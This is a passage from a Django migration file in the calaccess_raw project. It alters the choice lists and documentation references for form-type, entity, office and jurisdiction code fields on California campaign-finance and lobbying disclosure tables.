documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=10), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=12), calaccess_raw.annotations.DocumentCloud(id='2712032-Cal-Errata-201', start_page=2)], help_text='Identifies the office being sought', max_length=3, verbose_name='office code'),
),
migrations.AlterField(
model_name='expncd',
name='sup_opp_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('O', 'OPPOSITION'), ('S', 'SUPPORT'), ('s', 'SUPPORT'), ('o', 'OPPOSITION'), ('H', 'UNKNOWN'), ('N', 'UNKNOWN'), ('X', 'UNKNOWN'), ('Y', 'UNKNOWN')], db_column='SUP_OPP_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=32), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=44)], help_text='Support or opposition code', max_length=1),
),
migrations.AlterField(
model_name='f495p2cd',
name='form_type',
field=calaccess_raw.fields.CharField(choices=[('F450', 'Form 450: Campaign Disclosure Statement, Short Form (Recipient Committee)'), ('F460', 'Form 460: Campaign Disclosure Statement (Recipient Committee)'), ('F495', 'Form 495: Supplemental Pre-Election Campaign Statement (Recipient Committee)')], db_column='FORM_TYPE', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=26), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=35)], help_text='Name of the source filing form to which the Form 495 is attached (must equal Form_Type in CVR record)', max_length=4),
),
migrations.AlterField(
model_name='f501502cd',
name='entity_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('ATH', 'Authorizing individual'), ('ATR', 'Assistant treasurer'), ('BMC', 'Ballot measure committee'), ('BNM', "Ballot measure's name/title"), ('CAO', 'Candidate/officeholder'), ('COM', 'Committee'), ('CTL', 'Controlled committee'), ('IND', 'Individual'), ('MDI', 'Major Donor/Ind Expenditure'), ('OFF', 'Officer'), ('OTH', 'Other'), ('POF', 'Principal officer'), ('PRO', 'Proponent'), ('PTY', 'Political Party'), ('RCP', 'Recipient committee'), ('SCC', 'Small Contributor Committee'), ('SMO', 'Slate-mailer organization'), ('SPO', 'Sponsor'), ('TRE', 'Treasurer'), ('8', 'Unknown')], db_column='ENTITY_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(end_page=9, id='2712033-Cal-Format-1-05-02', start_page=8), calaccess_raw.annotations.DocumentCloud(end_page=11, id='2712034-Cal-Format-201', start_page=9)], help_text='Entity code', max_length=9),
),
migrations.AlterField(
model_name='f501502cd',
name='form_type',
field=calaccess_raw.fields.CharField(choices=[('F501', 'Form 501: Candidate Intention Statement'), ('F502', 'Form 502: Campaign Bank Account Statement')], db_column='FORM_TYPE', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=58)], help_text='Name of the source filing form or schedule', max_length=4),
),
migrations.AlterField(
model_name='f690p2cd',
name='form_type',
field=calaccess_raw.fields.CharField(choices=[('F615', 'Form 615: Lobbyist Report'), ('F625', 'Form 625: Report of Lobbying Firm'), ('F635', 'Form 635: Report of Lobbyist Employer or Report of Lobbying Coalition'), ('F645', 'Form 645: Report of Person Spending $5,000 or More')], db_column='FORM_TYPE', db_index=True, documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=58), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=72)], help_text='Name of the source filing form or schedule', max_length=4),
),
migrations.AlterField(
model_name='filerfilingscd',
name='form_id',
field=calaccess_raw.fields.CharField(choices=[('F400', 'Form 400: Statement of Organization (Slate Mailer Organization)'), ('F401', 'Form 401: Campaign Disclosure Statement (Slate Mailer Organization)'), ('F402', 'Form 402: Statement of Termination (Slate Mailer Organization)'), ('F405', 'Form 405: Amendment to Campaign Disclosure Statement'), ('F410', 'Form 410: Statement of Organization (Recipient Committee)'), ('F415', 'Form 415: Title Unknown'), ('F416', 'Form 416: Title Unknown'), ('F419', 'Form 419: Campaign Disclosure Statement, Long Form (Ballot Measure Committee)'), ('F420', 'Form 420: Campaign Disclosure Statement, Long Form (Recipient Committee)'), ('F425', 'Form 425: Semi-Annual Statement of No Activity (Recipient Committee)'), ('F430', 'Form 430: Title Unknown'), ('F450', 'Form 450: Campaign Disclosure Statement, Short Form (Recipient Committee)'), ('F460', 'Form 460: Campaign Disclosure Statement (Recipient Committee)'), ('F461', 'Form 461: Campaign Disclosure Statement (Independent Expenditure Committee & Major Donor Committee)'), ('F465', 'Form 465: Supplemental Independent Expenditure Report'), ('F470', 'Form 470: Campaign Disclosure Statement, Short Form (Officeholders and Candidates)'), ('F490', 'Form 490: Campaign Disclosure Statement, Long Form (Officeholders and Candidates)'), ('F495', 'Form 495: Supplemental Pre-Election Campaign Statement (Recipient Committee)'), ('F496', 'Form 496: Late Independent Expenditure Report'), ('F497', 'Form 497: Late Contribution Report'), ('F498', 'Form 498: Late Payment Report (Slate Mailer Organization)'), ('F501', 'Form 501: Candidate Intention Statement'), ('F502', 'Form 502: Campaign Bank Account Statement'), ('F511', 'Form 511: Paid Spokesperson Report'), ('E530', 'Electronic Form 530: Electronic Issue Advocacy Report'), ('F601', 'Form 601: Lobbying Firm Registration Statement'), ('F602', 'Form 602: Lobbying Firm Activity Authorization'), ('F603', 'Form 603: Lobbyist Employer or Lobbying Coalition Registration Statement'), ('F604', 'Form 604: Lobbyist Certification Statement'), ('F605', 'Form 605: Amendment to Registration, Lobbying Firm, Lobbyist Employer, Lobbying Coalition'), ('F606', 'Form 606: Notice of Termination'), ('F607', 'Form 607: Notice of Withdrawal'), ('F615', 'Form 615: Lobbyist Report'), ('F625', 'Form 625: Report of Lobbying Firm'), ('S630', 'Schedule 630: Payments Made to Lobbying Coalitions (Attachment to Form 625 or 635) '), ('F635', 'Form 635: Report of Lobbyist Employer or Report of Lobbying Coalition'), ('S635-C', 'Schedule 635C: Payments Received by Lobbying Coalitions'), ('S640', 'Schedule 640: Governmental Agencies Reporting (Attachment to Form 635 or Form 645)'), ('F645', 'Form 645: Report of Person Spending $5,000 or More'), ('F690', 'Form 690: Amendment to Lobbying Disclosure Report'), ('F700', 'Form 700: Statement of Economic Interest'), ('F900', 'Form 900: Campaign Disclosure Statement (Public employee retirement board candidate)'), ('F111', 'Unknown'), ('F410 AT', 'Unknown'), ('F410ATR', 'Unknown'), ('F421', 'Unknown'), ('F440', 'Unknown'), ('F470S', 'Form 470: Campaign Disclosure Statement, Short Form (Officeholders and Candidates)'), ('F480', 'Unknown'), ('F500', 'Unknown'), ('F501502', 'Forms 501 and/or 502 (Candidate Intention and/or Bank Account Statements)'), ('F555', 'Unknown'), ('F666', 'Unknown'), ('F777', 'Unknown'), ('F888', 'Unknown'), ('F999', 'Unknown')], db_column='FORM_ID', db_index=True, documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2711614-CalAccessTablesWeb', start_page=65)], help_text='Form identification code', max_length=7, verbose_name='form type'),
),
migrations.AlterField(
model_name='headercd',
name='form_id',
field=calaccess_raw.fields.CharField(choices=[('AF490', 'Form 490, Part A'), ('AP1', 'Allocation Part 1'), ('AP2', 'Allocation Part 2'), ('BF490', 'Form 490, Part B'), ('CF490', 'Form 490, Part C'), ('DF490', 'Form 490, Part D'), ('EF490', 'Form 490, Part E'), ('F450', 'Form 450: Campaign Disclosure Statement, Short Form (Recipient Committee)'), ('F460', 'Form 460: Campaign Disclosure Statement (Recipient Committee)'), ('F461', 'Form 461: Campaign Disclosure Statement (Independent Expenditure Committee & Major Donor Committee)'), ('FF490', 'Form 490, Part F'), ('HF490', 'Form 490, Part H'), ('IF490', 'Form 490, Part I')], db_column='FORM_ID', help_text='Form identification code', max_length=5, verbose_name='Form ID'),
),
migrations.AlterField(
model_name='lattcd',
name='entity_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('FRM', 'Lobbying Firm'), ('IND', 'Person (spending > $5000)'), ('LBY', 'Lobbyist (an individual)'), ('LCO', 'Lobbying Coalition'), ('LEM', 'Lobbying Employer'), ('OTH', 'Other'), ('RCP', 'Recipient Committee')], db_column='ENTITY_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=65), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=80)], help_text='Entity Code of the Payment Recipient/Payee', max_length=3, verbose_name='entity code'),
),
migrations.AlterField(
model_name='lattcd',
name='form_type',
field=calaccess_raw.fields.CharField(choices=[('S630', 'Schedule 630: Payments Made to Lobbying Coalitions (Attachment to Form 625 or 635) '), ('S635-C', 'Schedule 635C: Payments Received by Lobbying Coalitions'), ('S640', 'Schedule 640: Governmental Agencies Reporting (Attachment to Form 635 or Form 645)')], db_column='FORM_TYPE', db_index=True, documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2711616-MapCalFormat2Fields', start_page=52), calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=65), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=79)], help_text='Name of the source filing form or schedule', max_length=6),
),
migrations.AlterField(
model_name='lccmcd',
name='entity_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('COM', 'Committee'), ('RCP', 'Recipient Committee'), ('CTL', 'Controlled committee')], db_column='ENTITY_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=64), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=78)], help_text='Entity Code for Recipient of the Campaign Contribution Value', max_length=3, verbose_name='entity code'),
),
migrations.AlterField(
model_name='lccmcd',
name='form_type',
field=calaccess_raw.fields.CharField(choices=[('F615P2', 'Form 615 (Lobbyist Report): Part 2, Campaign Contributions Made or Delivered'), ('F625P4B', 'Form 625 (Report of Lobbying Firm): Part 4, Campaign Contributions Made'), ('F635P4B', 'Form 635 (Report of Lobbyist Employer or Report of Lobbying Coalition): Part 4, Campaign Contributions Made'), ('F645P3B', 'Form 645 (Report of Person Spending $5,000 or More): Part 3, Campaign Contributions Made')], db_column='FORM_TYPE', db_index=True, documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=64), calaccess_raw.annotations.DocumentCloud(end_page=79, id='2712034-Cal-Format-201', start_page=78)], help_text='Name of the source filing form or schedule', max_length=7),
),
migrations.AlterField(
model_name='lempcd',
name='form_type',
field=calaccess_raw.fields.CharField(choices=[('F601P2A', 'Form 601 (Lobbying Firm Registration Statement): Part 2, Section A, Lobbyist Employers'), ('F601P2B', 'Form 601 (Lobbying Firm Registration Statement): Part 2, Section B, Subcontracted Clients')], db_column='FORM_TYPE', db_index=True, documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=75), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=90)], help_text='Name of the source filing form or schedule', max_length=7, verbose_name='form type'),
),
migrations.AlterField(
model_name='lexpcd',
name='entity_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('IND', 'Person (spending > $5000)'), ('OTH', 'Other')], db_column='ENTITY_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=61), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=75)], help_text='Entity Code of the Payee', max_length=3, verbose_name='entity code'),
),
migrations.AlterField(
model_name='lexpcd',
name='form_type',
field=calaccess_raw.fields.CharField(choices=[('F615P1', 'Form 615 (Lobbyist Report): Part 1, Activity Expenses Paid, Incurred, Arranged or Provided by the Lobbyist'), ('F625P3A', 'Form 625 (Report of Lobbying Firm): Part 3, Payments Made In Connection With Lobbying Activities, Section A, Activity Expenses'), ('F635P3C', 'Form 635 (Report of Lobbyist Employer or Report of Lobbying Coalition): Part 3, Payments Made in Connection with Lobbying Activities, Section C, Activity Expenses'), ('F645P2A', 'Form 645 (Report of Person Spending $5,000 or More): Part 2, Payments Made this Period, Section A, Activity Expenses')], db_column='FORM_TYPE', db_index=True, documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=61), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=74)], help_text='Name of the source filing form or schedule', max_length=7),
),
migrations.AlterField(
model_name='loancd',
name='entity_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('COM', 'Committee'), ('IND', 'Individual'), ('OTH', 'Other'), ('PTY', 'Political Party'), ('RCP', 'Recipient committee'), ('SCC', 'Small Contributor Committee')], db_column='ENTITY_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=35), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=47)], help_text='Entity code describing the lender', max_length=3, verbose_name='entity code'),
),
migrations.AlterField(
model_name='loancd',
name='form_type',
field=calaccess_raw.fields.CharField(choices=[('B1', 'Form 460 (Campaign Disclosure Statement (Recipient Committee)): Schedule B, Part 1, Loans Received'), ('B2', 'Form 460 (Campaign Disclosure Statement (Recipient Committee)): Schedule B, Part 2, Loan Guarantors'), ('B3', 'Form 460 (Campaign Disclosure Statement (Recipient Committee)): Schedule B, Part 3, Outstanding Balance'), ('H', 'Form 460 (Campaign Disclosure Statement (Recipient Committee)): Schedule H, Loans Made to Others'), ('H1', 'Form 460 (Campaign Disclosure Statement (Recipient Committee)): Schedule H, Part 1, Loans Made'), ('H2', 'Form 460 (Campaign Disclosure Statement (Recipient Committee)): Schedule H, Part 2, Repayments Rcvd'), ('H3', 'Form 460 (Campaign Disclosure Statement (Recipient Committee)): Schedule H, Part 3, Outstanding Loans')], db_column='FORM_TYPE', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=35), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=47)], help_text='Name of the source filing form or schedule', max_length=2),
),
migrations.AlterField(
model_name='lobbyamendmentscd',
name='form_type',
field=calaccess_raw.fields.CharField(choices=[('F601', 'Form 601: Lobbying Firm Registration Statement'), ('F603', 'Form 603: Lobbyist Employer or Lobbying Coalition Registration Statement')], db_column='FORM_TYPE', db_index=True, documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=74), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=88)], help_text='Name of the source filing form or schedule', max_length=9),
),
migrations.AlterField(
model_name='lothcd',
name='form_type',
field=calaccess_raw.fields.CharField(choices=[('F625P3B', 'Form 625 (Report of Lobbying Firm): Part 3, Payments Made In Connection With Lobbying Activities, Section B, Payments Made')], db_column='FORM_TYPE', db_index=True, documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=63), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=77)], help_text='Name of the source filing form or schedule', max_length=7, verbose_name='form type'),
),
migrations.AlterField(
model_name='lpaycd',
name='entity_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('FRM', 'Lobbying Firm'), ('LCO', 'Lobbying Coalition'), ('LEM', 'Lobbying Employer'), ('OTH', 'Other'), ('128', 'Unknown')], db_column='ENTITY_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=62), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=76)], help_text='Entity Code of the Employer Values', max_length=3, verbose_name='entity code'),
),
migrations.AlterField(
model_name='lpaycd',
name='form_type',
field=calaccess_raw.fields.CharField(choices=[('F625P2', 'Form 625 (Report of Lobbying Firm): Part 2, Payments Received in Connection with Lobbying Activity'), ('F635P3B', 'Form 635 (Report of Lobbyist Employer or Report of Lobbying Coalition): Part 3, Payments Made in Connection with Lobbying Activities, Section B, Payments To Lobbying Firms')], db_column='FORM_TYPE', db_index=True, documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=62), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=76)], help_text='Name of the source filing form or schedule', max_length=7, verbose_name='form type'),
),
migrations.AlterField(
model_name='rcptcd',
name='entity_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('COM', 'Committee'), ('IND', 'Individual'), ('PTY', 'Political Party'), ('OTH', 'Other'), ('RCP', 'Recipient committee'), ('SCC', 'Small Contributor Committee'), ('Com', 'Committee'), ('CAO', 'Candidate/officeholder'), ('BNM', "Ballot measure's name/title"), ('OFF', 'Officer'), ('0', 'Unknown'), ('PTH', 'Unknown'), ('RFD', 'Unknown'), ('MBR', 'Unknown')], db_column='ENTITY_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2711616-MapCalFormat2Fields', start_page=71), calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=29), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=37), calaccess_raw.annotations.DocumentCloud(end_page=9, id='2712033-Cal-Format-1-05-02', start_page=8), calaccess_raw.annotations.DocumentCloud(end_page=11, id='2712034-Cal-Format-201', start_page=9)], help_text='Entity Code describing the contributor', max_length=3),
),
migrations.AlterField(
model_name='rcptcd',
name='form_type',
field=calaccess_raw.fields.CharField(choices=[('E530', 'Electronic Form 530: Electronic Issue Advocacy Report'), ('F900', 'Form 900: Campaign Disclosure Statement (Public employee retirement board candidate)'), ('F401A', 'Form 401 (Campaign Disclosure Statement (Slate Mailer Organization)): Schedule A, Payments Received'), ('A', 'Form 460 (Campaign Disclosure Statement (Recipient Committee)): Schedule A, Monetary Contributions Received'), ('A-1', 'Form 460 (Campaign Disclosure Statement (Recipient Committee)): Schedule A-1, Contributions Transferred to Special Election Committee'), ('C', 'Form 460 (Campaign Disclosure Statement (Recipient Committee)): Schedule C, Non-Monetary Contributions Received'), ('I', 'Form 460 (Campaign Disclosure Statement (Recipient Committee)): Schedule I, Miscellaneous increases to cash'), ('F496P3', 'Form 496 (Late Independent Expenditure Report): Part 3, Contributions > $100 Received')], db_column='FORM_TYPE', db_index=True, documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=29), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=37)], help_text='Name of the source filing form or schedule', max_length=9),
),
migrations.AlterField(
model_name='rcptcd',
name='juris_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('ASM', 'Assembly District'), ('BOE', 'Board of Equalization District'), ('CIT', 'City'), ('CTY', 'County'), ('LOC', 'Local'), ('OTH', 'Other'), ('SEN', 'Senate District'), ('STW', 'Statewide'), ('BED', 'Other'), ('CLB', 'Other'), ('COU', 'County'), ('CO', 'Other'), ('SAC', 'Unknown'), ('PER', 'Unknown'), ('SF', 'Unknown'), ('OR', 'Unknown'), ('AL', 'Unknown'), ('4', 'Unknown'), ('CA', 'Unknown')], db_column='JURIS_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2711616-MapCalFormat2Fields', start_page=74), calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=30), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=40)], help_text='Office jurisdiction code. See the CAL document for the list of legal values. Used on Form 401 Schedule A', max_length=3),
),
migrations.AlterField(
model_name='rcptcd',
name='off_s_h_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('S', 'SOUGHT'), ('H', 'HELD')], db_column='OFF_S_H_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2711616-MapCalFormat2Fields', start_page=75), calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=30), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=40)], help_text='Office is sought or held code', max_length=1),
),
migrations.AlterField(
model_name='rcptcd',
name='office_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('APP', 'State Appellate Court Justice'), ('ASM', 'State Assembly Person'), ('ASR', 'Assessor'), ('ATT', 'Attorney General'), ('BED', 'Board of Education'), ('BOE', 'Board of Equalization Member'), ('BSU', 'Board of Supervisors'), ('CAT', 'City Attorney'), ('CCB', 'Community College Board'), ('CCM', 'City Council Member'), ('CON', 'State Controller'), ('COU', 'County Counsel'), ('CSU', 'County Supervisor'), ('CTR', 'Local Controller'), ('DAT', 'District Attorney'), ('GOV', 'Governor'), ('INS', 'Insurance Commissioner'), ('LTG', 'Lieutenant Governor'), ('MAY', 'Mayor'), ('OTH', 'Other'), ('PDR', 'Public Defender'), ('PER', 'Public Employees Retirement System'), ('PLN', 'Planning Commissioner'), ('SCJ', 'Superior Court Judge'), ('SEN', 'State Senator'), ('SHC', 'Sheriff-Coroner'), ('SOS', 'Secretary of State'), ('SPM', 'Supreme Court Justice'), ('SUP', 'Superintendent of Public Instruction'), ('TRE', 'State Treasurer'), ('TRS', 'Local Treasurer'), ('asm', 'State Assembly Person'), ('gov', 'Governor'), ('OTh', 'Other'), ('oth', 'Other'), ('csu', 'County Supervisor'), ('H', 'Unknown'), ('HOU', 'Unknown'), ('ASS', 'Unknown')], db_column='OFFICE_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=10), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=12), calaccess_raw.annotations.DocumentCloud(id='2712032-Cal-Errata-201', start_page=2)], help_text='Identifies the office being sought', max_length=3, verbose_name='office code'),
),
migrations.AlterField(
model_name='rcptcd',
name='rec_type',
field=calaccess_raw.fields.CharField(choices=[('E530', 'Electronic Form 530: Electronic Issue Advocacy Report'), ('RCPT', 'Receipt')], db_column='REC_TYPE', db_index=True, documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2711616-MapCalFormat2Fields', start_page=71), calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=37), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=29)], help_text='Record Type Value: CVR', max_length=4, verbose_name='record type'),
),
migrations.AlterField(
model_name='rcptcd',
name='sup_opp_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('S', 'SUPPORT'), ('O', 'OPPOSITION'), ('F', 'Unknown')], db_column='SUP_OPP_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2711616-MapCalFormat2Fields', start_page=74), calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=30), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=40)], help_text='Support or opposition code', max_length=1),
),
migrations.AlterField(
model_name='receivedfilingscd',
name='form_id',
field=calaccess_raw.fields.CharField(blank=True, choices=[('F400', 'Form 400: Statement of Organization (Slate Mailer Organization)'), ('F401', 'Form 401: Campaign Disclosure Statement (Slate Mailer Organization)'), ('F402', 'Form 402: Statement of Termination (Slate Mailer Organization)'), ('F410', 'Form 410: Statement of Organization (Recipient Committee)'), ('F425', 'Form 425: Semi-Annual Statement of No Activity (Recipient Committee)'), ('F450', 'Form 450: Campaign Disclosure Statement, Short Form (Recipient Committee)'), ('F460', 'Form 460: Campaign Disclosure Statement (Recipient Committee)'), ('F461', 'Form 461: Campaign Disclosure Statement (Independent Expenditure Committee & Major Donor Committee)'), ('F465', 'Form 465: Supplemental Independent Expenditure Report'), ('F496', 'Form 496: Late Independent Expenditure Report'), ('F497', 'Form 497: Late Contribution Report'), ('F498', 'Form 498: Late Payment Report (Slate Mailer Organization)'), ('F601', 'Form 601: Lobbying Firm Registration Statement'), ('F602', 'Form 602: Lobbying Firm Activity Authorization'), ('F603', 'Form 603: Lobbyist Employer or Lobbying Coalition Registration Statement'), ('F604', 'Form 604: Lobbyist Certification Statement'), ('F606', 'Form 606: Notice of Termination'), ('F607', 'Form 607: Notice of Withdrawal'), ('F615', 'Form 615: Lobbyist Report'), ('F625', 'Form 625: Report of Lobbying Firm'), ('F635', 'Form 635: Report of Lobbyist Employer or Report of Lobbying Coalition'), ('F645', 'Form 645: Report of Person Spending $5,000 or More')], db_column='FORM_ID', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(end_page=8, id='2711624-Overview', start_page=4)], help_text='Form identification code', max_length=7, verbose_name='form identification code'),
),
migrations.AlterField(
model_name='s401cd',
name='form_type',
field=calaccess_raw.fields.CharField(blank=True, choices=[('F401B', 'Form 401 (Campaign Disclosure Statement (Slate Mailer Organization)): Schedule B, Payments Made'), ('F401B-1', 'Form 401 (Campaign Disclosure Statement (Slate Mailer Organization)): Schedule B-1, Payments Made by Agent or Independent Contractor'), ('F401C', 'Form 401 (Campaign Disclosure Statement (Slate Mailer Organization)): Schedule C, Persons Receiving $1,000 or More'), ('F401D', 'Form 401 (Campaign Disclosure Statement (Slate Mailer Organization)): Schedule D, Candidates and Measures Not Listed on Schedule A')], db_column='FORM_TYPE', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=39), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=51)], help_text='Name of the source filing form or schedule', max_length=7),
),
migrations.AlterField(
model_name='s401cd',
name='juris_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('ASM', 'Assembly District'), ('BOE', 'Board of Equalization District'), ('CIT', 'City'), ('CTY', 'County'), ('LOC', 'Local'), ('OTH', 'Other'), ('SEN', 'Senate District'), ('STW', 'Statewide'), ('SAC', 'Unknown'), ('CT', 'Unknown'), ('ca', 'Unknown'), ('CAL', 'Unknown'), ('OR', 'Unknown'), ('AL', 'Unknown'), ('CA', 'Unknown'), ('10', 'Unknown')], db_column='JURIS_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2711616-MapCalFormat2Fields', start_page=77), calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=39), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=52)], help_text='Office jurisdiction code', max_length=3),
),
migrations.AlterField(
model_name='s401cd',
name='off_s_h_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('S', 'SOUGHT'), ('H', 'HELD')], db_column='OFF_S_H_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=39), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=52)], help_text='Office is sought or held code', max_length=1),
),
migrations.AlterField(
model_name='s401cd',
name='office_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('APP', 'State Appellate Court Justice'), ('ASM', 'State Assembly Person'), ('ASR', 'Assessor'), ('ATT', 'Attorney General'), ('BED', 'Board of Education'), ('BOE', 'Board of Equalization Member'), ('BSU', 'Board of Supervisors'), ('CAT', 'City Attorney'), ('CCB', 'Community College Board'), ('CCM', 'City Council Member'), ('CON', 'State Controller'), ('COU', 'County Counsel'), ('CSU', 'County Supervisor'), ('CTR', 'Local Controller'), ('DAT', 'District Attorney'), ('GOV', 'Governor'), ('INS', 'Insurance Commissioner'), ('LTG', 'Lieutenant Governor'), ('MAY', 'Mayor'), ('OTH', 'Other'), ('PDR', 'Public Defender'), ('PER', 'Public Employees Retirement System'), ('PLN', 'Planning Commissioner'), ('SCJ', 'Superior Court Judge'), ('SEN', 'State Senator'), ('SHC', 'Sheriff-Coroner'), ('SOS', 'Secretary of State'), ('SPM', 'Supreme Court Justice'), ('SUP', 'Superintendent of Public Instruction'), ('TRE', 'State Treasurer'), ('TRS', 'Local Treasurer'), ('asm', 'State Assembly Person'), ('ltg', 'Lieutenant Governor'), ('OTh', 'Other'), ('att', 'Attorney General'), ('oth', 'Other'), ('tre', 'State Treasurer'), ('con', 'State Controller'), ('boe', 'Board of Equalization Member'), ('sos', 'Secretary of State'), ('sup', 'Superintendent of Public Instruction'), ('H', 'Unknown')], db_column='OFFICE_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=10), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=12), calaccess_raw.annotations.DocumentCloud(id='2712032-Cal-Errata-201', start_page=2)], help_text='Identifies the office being sought', max_length=3, verbose_name='office code'),
),
migrations.AlterField(
model_name='s401cd',
name='sup_opp_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('S', 'SUPPORT'), ('O', 'OPPOSITION')], db_column='SUP_OPP_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=39), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=52)], help_text='Support or opposition code', max_length=1),
),
migrations.AlterField(
model_name='s496cd',
name='form_type',
field=calaccess_raw.fields.CharField(blank=True, choices=[('F496', 'Form 496: Late Independent Expenditure Report')], db_column='FORM_TYPE', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=40), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=53)], help_text='Name of the source filing form or schedule', max_length=4),
),
migrations.AlterField(
model_name='s497cd',
name='entity_cd',
